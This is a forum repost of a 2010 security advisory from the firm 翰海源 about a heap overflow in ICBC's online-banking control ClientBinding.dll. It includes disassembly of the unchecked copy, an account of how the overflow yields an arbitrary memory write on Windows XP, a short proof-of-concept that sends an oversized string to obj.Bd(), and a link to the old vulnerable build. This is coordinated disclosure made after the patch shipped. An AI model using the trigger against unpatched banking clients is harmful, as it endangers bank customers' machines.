点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 翰海源 [公告]请下载新版工行个人网银
中国首家专注于软件安全测试的专业公司,十多年的软件安全领域研究经验,依托全球知名的Code Audit Labs(代码审计实验室),默默的在为各大软/硬件产商提供安全测试外包服务,为软件的代码质量做出自己的贡献。安全测试是个高门槛,高技术含量的工作,一般的企业很少有自己的安全测试团队。那么,我们,翰海源就是您的安全测试团队。
2010-08-21 07:51
[公告]
翰海源安全测试图团队在工行个人网银里发现一个高威胁的安全漏洞,可导致攻击者执行任意代码,并将此漏洞上报给工行珠海开发中心。7月底工行个人网银已修复该漏洞并发布了新的个人网银版本,考虑到工行网银的使用度和客户1DAY的修复时间,我们现在再发布公告,望没有安装新版本工行网银的用户及时安装新版本工行网银以避免威胁
[漏洞细节]
该漏洞存是在于ClientBinding.dll的一个缓冲区溢出,ClientBinding存在一个BD接口,第一个参数代表一个路径,和http://www.icbc.com.cn/一起拼接成一个路径,但是系统对这个路径只固定分配了0x400大小的堆内存
10010035 6800040000 push 0x400
1001003a e801470000 call ClientBinding!Gcrv+0x99c0 (10014740)
1001003f 83c404 add esp,0x4
10010042 8bf0 mov esi,eax
但是在拷贝数据的时候,是根据参数1的真实长度来拷贝的,而并没有检测是否大于0X400,因此直接导致了一个堆溢出
10001543 76f7 jbe ClientBinding+0x153c (1000153c)
10001545 8bce mov ecx,esi
10001547 2bc6 sub eax,esi
10001549 8da42400000000 lea esp,[esp]
10001550 8a1401 mov dl,[ecx+eax] ds:0023:014d63d3=6b
10001553 8811 mov [ecx],dl
10001555 41 inc ecx
10001556 83ef01 sub edi,0x1
10001559 75f5 jnz ClientBinding+0x1550 (10001550)
之后,在WINDOWS XP的系统上,会直接在HEAPFREE里对一个覆盖的指针地址进行写入,由于该地址来源于攻击者覆盖的地址,攻击者可以任意构造地址写入。
7c9308ee 8908 mov [eax],ecx
7c9308f0 895004 mov [eax+0x4],edx
7c9308f3 8902 mov [edx],eax ds:0023:75747372=????????
7c9308f5 894104 mov [ecx+0x4],eax
7c9308f8 56 push esi
7c9308f9 8b75c8 mov esi,[ebp-0x38]
继续执行,则向一个攻击者可控的地址写入当前内容地址,由于是攻击者可控的地址,该漏洞是一个非常容易利用的漏洞
[验证POC]
Str="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789vabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrAAAstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
obj.Bd(Str, 0)
[老版本验证下载地址]
http://www.vdisk.cn/down/index/4800758A1266
该版本用于验证此安全漏洞
[工行新版本个人网银下载地址]
http://www.icbc.com.cn/icbc/html ... client_controls.exe
[感谢]
感谢工行对漏洞报告的重视和及时修复
[时间线]
6月23号:翰海源发现该高威漏洞
6月30号:翰海源向珠海工行开发中心报告该漏洞
7月23号:工行网银发布新的网银修复该漏洞
8月21号: 翰海源公告
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
